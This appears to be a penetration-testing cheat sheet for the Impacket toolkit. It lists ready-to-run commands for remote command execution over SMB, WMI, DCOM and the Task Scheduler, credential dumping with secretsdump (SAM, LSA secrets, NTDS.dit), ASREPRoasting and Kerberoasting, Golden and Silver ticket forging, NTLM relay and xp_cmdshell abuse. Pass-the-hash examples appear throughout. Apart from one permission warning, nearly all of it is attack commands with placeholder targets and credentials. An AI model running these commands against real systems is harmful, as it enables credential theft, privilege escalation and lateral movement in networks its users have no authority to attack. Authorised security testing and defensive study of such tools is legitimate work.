Impacket Toolkit Cheat Sheet

Overview

Impacket is a collection of Python classes for working with network protocols. It provides low-level programmatic access to packets and implements several protocols including SMB, MSRPC, and Kerberos. Impacket includes numerous ready-to-use tools for penetration testing, particularly focused on Windows environments.

⚠️ Warning: Impacket is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

From PyPI

pip install impacket

From GitHub

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

On Kali Linux

sudo apt update
sudo apt install -y python3-impacket

Using Virtual Environment

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Command Execution Tools

psexec.py

Executes commands on remote Windows systems using the SMB protocol, similar to SysInternals' PsExec.

Basic Usage

psexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-k	Use Kerberos authentication
-no-pass	Don't ask for password (useful for Kerberos)
-port [port]	Connect to SMB Server port (default: 445)
-debug	Turn DEBUG output ON

Examples

# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec.py

Similar to psexec.py but uses different techniques to execute commands, making it potentially stealthier.

Basic Usage

smbexec.py [domain/]username[:password]@target [options]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE	Share where the output will be grabbed from (default: ADMIN$)
-shell-type {cmd,powershell}	Shell type to use (default: cmd)
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-service-name NAME	Service name to use (default: random)

Examples

# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec.py

Executes commands on remote Windows systems using WMI.

Basic Usage

wmiexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE	Share where the output will be grabbed from (default: ADMIN$)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type {cmd,powershell}	Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec.py

Executes commands on remote Windows systems using DCOM objects.

Basic Usage

dcomexec.py [domain/]username[:password]@target [options] [command]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-object {ShellWindows,ShellBrowserWindow,MMC20}	DCOM object to use (default: MMC20.Application)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type {cmd,powershell}	Shell type to use (default: cmd)

Examples

# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py

Executes commands on remote Windows systems using the Task Scheduler service.

Basic Usage

atexec.py [domain/]username[:password]@target [options] command

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)

Examples

# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

Credential Dumping Tools

secretsdump.py

Extracts credentials from a remote Windows system, including SAM, LSA Secrets, and NTDS.dit.

Basic Usage

secretsdump.py [domain/]username[:password]@target [options]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-just-dc	Extract only NTDS.DIT data (domain controller only)
-just-dc-ntlm	Extract only NTDS.DIT NTLM hashes (domain controller only)
-just-dc-user USER	Extract only NTDS.DIT data for specific user
-pwd-last-set	Shows pwdLastSet attribute for each NTDS.DIT account
-user-status	Shows whether the user is enabled or disabled
-history	Dump password history
-outputfile FILE	Write output to file

Examples

# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

Kerberos Attack Tools

GetNPUsers.py

Retrieves password hashes for users with "Do not require Kerberos preauthentication" set (ASREPRoast attack).

Basic Usage

GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options

Option	Description
-request	Requests TGT for users and output them in JtR/hashcat format
-no-pass	Don't ask for password (useful for Kerberos)
-k	Use Kerberos authentication
-dc-ip IP	IP Address of the domain controller
-usersfile FILE	File with user per line to test
-format {hashcat,john}	Format to save the AS_REP responses (default: hashcat)
-outputfile FILE	Output filename to write ciphers in JtR/hashcat format

Examples

# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass

GetUserSPNs.py

Retrieves Service Principal Names (SPNs) for accounts in the domain (Kerberoasting attack).

Basic Usage

GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Common Options

Option	Description
-request	Requests TGS for users and output them in JtR/hashcat format
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-dc-ip IP	IP Address of the domain controller
-target-user USER	Target specific user to request TGS for
-outputfile FILE	Output filename to write ciphers in JtR/hashcat format
-format {hashcat,john}	Format to save the TGS tickets (default: hashcat)

Examples

# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request

ticketer.py

Creates Golden and Silver Tickets for Kerberos authentication.

Basic Usage

ticketer.py [options] username

Common Options

Option	Description
-nthash HASH	NT hash for the user or service account
-aesKey KEY	AES key for the user or service account
-domain DOMAIN	Domain name
-domain-sid SID	Domain SID
-spn SPN	Service Principal Name (for Silver Tickets)
-groups IDS	Comma-separated list of group IDs to include in the ticket
-duration HOURS	Ticket duration in hours (default: 10)
-out FILE	Output filename to save the ticket

Examples

# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator

Network Protocols Tools

smbclient.py

Provides an SMB client to access shares and files on remote systems.

Basic Usage

smbclient.py [domain/]username[:password]@target [options]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-port [port]	Connect to SMB Server port (default: 445)
-file FILE	Input file with commands to execute in the mini shell
-debug	Turn DEBUG output ON

Common Commands (Interactive Shell)

Command	Description
help	Show available commands
shares	List available shares
use <share>	Connect to a specific share
ls	List files in current directory
cd <dir>	Change directory
get <file>	Download file
put <file>	Upload file
rm <file>	Delete file
mkdir <dir>	Create directory
rmdir <dir>	Remove directory
exit	Exit the shell

Examples

# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient.py

Provides a client to interact with Microsoft SQL Server instances.

Basic Usage

mssqlclient.py [domain/]username[:password]@target [options]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-windows-auth	Use Windows Authentication (default: False)
-port [port]	Destination port to connect to (default: 1433)
-db DATABASE	MSSQL database instance (default: None)
-file FILE	Input file with commands to execute in the SQL shell
-debug	Turn DEBUG output ON

Common Commands (Interactive Shell)

Command	Description
help	Show available commands
enable_xp_cmdshell	Enable the xp_cmdshell stored procedure
disable_xp_cmdshell	Disable the xp_cmdshell stored procedure
xp_cmdshell <command>	Execute command through xp_cmdshell
sp_start_job <job>	Start a SQL Server job
exit	Exit the shell

Examples

# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Other Useful Tools

ntlmrelayx.py

Performs NTLM Relay attacks.

Basic Usage

ntlmrelayx.py [options]

Common Options

Option	Description
-t TARGET	Target to relay the credentials to
-tf FILE	File with targets to relay the credentials to
-w	Start the HTTP server and do not relay credentials
-e FILE	Execute this file when a connection is relayed
-c COMMAND	Execute this command when a connection is relayed
-smb2support	Enable SMB2 support
-socks	Launch a SOCKS proxy for the connection
-one-shot	Relay only one connection
-debug	Turn DEBUG output ON

Examples

# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks

lookupsid.py

Performs SID lookups to enumerate users and groups.

Basic Usage

lookupsid.py [domain/]username[:password]@target [options]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-domain DOMAIN	Domain to enumerate (default: target domain)
-debug	Turn DEBUG output ON

Examples

# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

reg.py

Provides a remote registry manipulation tool.

Basic Usage

reg.py [domain/]username[:password]@target [options] action [params]

Common Options

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-debug	Turn DEBUG output ON

Actions

Action	Description
query	Query a registry key or value
add	Add a registry key or value
delete	Delete a registry key or value
save	Save a registry hive to a file

Examples

# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test

Common Parameters Across Tools

Parameter	Description
-h, --help	Show help message and exit
-debug	Turn DEBUG output ON
-hashes LMHASH:NTHASH	NTLM hashes, format is LMHASH:NTHASH
-no-pass	Don't ask for password (useful for Kerberos)
-k	Use Kerberos authentication
-aesKey KEY	AES key to use for Kerberos authentication
-dc-ip IP	IP Address of the domain controller
-target-ip IP	IP Address of the target machine
-port [port]	Destination port to connect to

Resources

• Official GitHub Repository
• Impacket Documentation
• Impacket Examples
• Impacket Wiki
• Impacket API Documentation